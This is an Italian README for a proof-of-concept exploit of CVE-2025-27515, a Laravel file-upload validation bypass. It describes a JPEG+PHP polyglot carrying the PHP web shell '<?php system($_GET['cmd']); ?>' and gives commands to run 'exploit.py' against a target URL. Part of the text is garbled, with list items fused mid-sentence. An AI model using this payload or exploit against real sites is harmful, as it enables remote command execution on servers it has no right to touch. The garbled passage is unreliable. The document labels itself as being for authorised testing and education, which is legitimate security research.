
PoC di CVE-2025-27515
Una dimostrazione pratica di CVE-2025-27515, una vulnerabilità di bypass della convalida del caricamento di file in Laravel Framework (≤ 12.0.0).
CVE-2025-27515 è un bypass della convalida che consente agli attaccanti di aggirare le restrizioni sul caricamento di file quando le applicazioni Laravel utilizzano pattern di convalida con wildcard (files.*). La vulnerabilità permette di caricare file maliziosi sfruttando debolezze nel modo in cui Laravel elabora i caricamenti di file basati su array.
Gravità: Media/Alta
CWE: CWE-20 (Convalida dell'Input Impropria)
Lo sfruttamento utilizza un file poliglotta JPEG+PHP che:
FF D8 FF E0) per bypassare la convalida del tipo MIME<?php system($_GET['cmd']); ?>).jpg per superare i controlli sull'estensione del filephp artisan serve
# Access at http://localhost:8000/upload
Versione Python:
pip3 install -r requirements.txt
python3 exploit.py http://localhost:8000
SOLO PER TEST DI SICUREZZA AUTORIZZATI E A SCOPO EDUCATIVO
Di Guaxinim | Ricerca sulla Sicurezza Informatica